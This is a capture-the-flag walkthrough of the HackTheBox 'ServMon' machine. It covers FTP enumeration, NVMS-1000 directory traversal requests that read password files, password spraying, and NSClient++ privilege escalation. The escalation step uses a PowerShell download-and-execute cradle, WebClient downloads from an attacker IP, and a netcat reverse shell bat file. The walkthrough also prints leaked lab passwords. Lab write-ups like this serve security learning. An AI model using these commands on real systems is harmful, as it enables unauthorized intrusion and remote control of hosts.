Again, we start with nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184
We've got everything open on this one. FTP, SSH, HTTP, RPC, HTTPS on 8443 and a bunch more. Let's start with FTP. It looks like Anonymous login is allowed. So, let's see what goodies are accessible. It looks like there are 2 folders in Users (Nadine and Nathan) with 1 TXT file each. Get them.
The one on Nadine's folder says:
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
And Nathan's says:
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
That appears to be everything we can get from FTP. Let's take a look at the HTTP site, which is the NVMS-1000 CCTV/NVR style surveillance system. Don't bother with trying Default Credentials. I already tried and failed. I can't seem to get anything working on HTTP. Let's jump to HTTPS and see if we have better luck. That appears to be NSCLient++ (whatever that is). Let's searchsploit NVMS and see if something jumps out.
OK. We have some directory traversal possibilities here. The 47774.txt (also found here) basically says intercept the main page HTTP GET request and change the target. Time to fire up BurpSuite. Intercept and send it to Repeater, change the GET string to "/../../../../../../../../../../../../windows/win.ini HTTP/1.1" and fire away.
Vulnerability Confirmed. The Confidential.txt file on Nadine's FTP folder says she put the passwords on Nathan's Desktop. So, let's try "GET"ting them. We change the GET string again, this time to:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
And we get the list of passwords on Nathan's Desktop.
The list is:
And we should be able to perform a password spray attack on.....well, everything. To start, create a users.txt file with administrator, Nathan, and Nadine in it. Create a passwords.txt file with the list above in it. It's a little funky, but here's the quick and dirty bash script for it.
Notice when it got to Nadine % L1k3B1gBut7s@W0rk that it replied Account Name: Nadine, Authority Name: SERVMON. That's a successful connection. We just got Nadine's credentials. SSH with that and we've got ourselves a foothold. Now, you can use the ssh_login module in Metasploit located auxiliary/scanner/ssh/ssh_login, but again MSF makes us lazy! Moving on. Looking around on the box (and since we already know NVMS and NSClient++ are on this machine) I find the NSClient.ini file that, surprise, has another password of "ew2x6SsGTxjRwXOT". Unfortunately, it also shows that we can only access it from the localhost, which is not very helpful right now. Let's keep looking.
What version of NSClient is running?
nadine@SERVMON C:\Program Files\NSClient++>nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
OH! Now we're getting somewhere! There is a Privilege Escalation path with NSClient++ version 0.5.2.35 located here. Obviously, we don't want to reboot the system like the exploit states, but we will need to restart the service. Let's see if we can do that. Performing a little bit of Google Fu, we can find https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ that has a nice PowerShell script that will do it for us. We just need to get it to the target. We do that using Msxml2.XMLHTTP COM.
$ex=New-Object -ComObject Msxml2.XMLHTTP;$ex.open('GET','http://10.10.14.10/ACL-View.ps1',$false);$ex.send();iex $ex.responseText
and then running it with
Get-Service nscp | fl *
And with CanStop being set to True, that means we CAN restart the service. We need to see that 8443 page, but only localhost can.....let's try an ssh tunnel.
ssh -L 8443:127.0.0.1:8443 firstname.lastname@example.org
Then we should be able to log in with the password found in the INI file on the https://localhost:8443 page.
Now we just follow the directions from the ExploitDB page. I change to the Temp directory and get Netcat over to the box.
Next, create the bat:
C:\Temp\nc.exe 10.10.14.10 9999 -e cmd.exe
and move it to the target the same way.
PS C:\Temp> $WebClient = New-Object System.Net.WebClient
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/nc.exe","C:\Temp\nc.exe")
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/exploited.bat","C:\Temp\exploited.bat")
After verifying that Netcat and our malicious bat file are in place, Restart the NSCP service.
Now, go to the Client webpage, Navigate to Settings > External Scripts > Scripts and hit Add New
In Section, give it a name (I used shell), in Key put command, and in Value set the path to our Batch file.
Once you add it, the Changes button at the top will change to red. Select it and hit Save Configuration.
Now that you have it added, restart the NSCP service with:
sc.exe stop ncsp
sc.exe start ncsp
Once it has restarted, start a netcat listener (nc -lvnp 9999), sign back into the NSClient Page and go to Console. Under the logs is an input box. Type in the name of the script you added (in my case shell) and hit Run. Check your Netcat listener. Administrator Shell.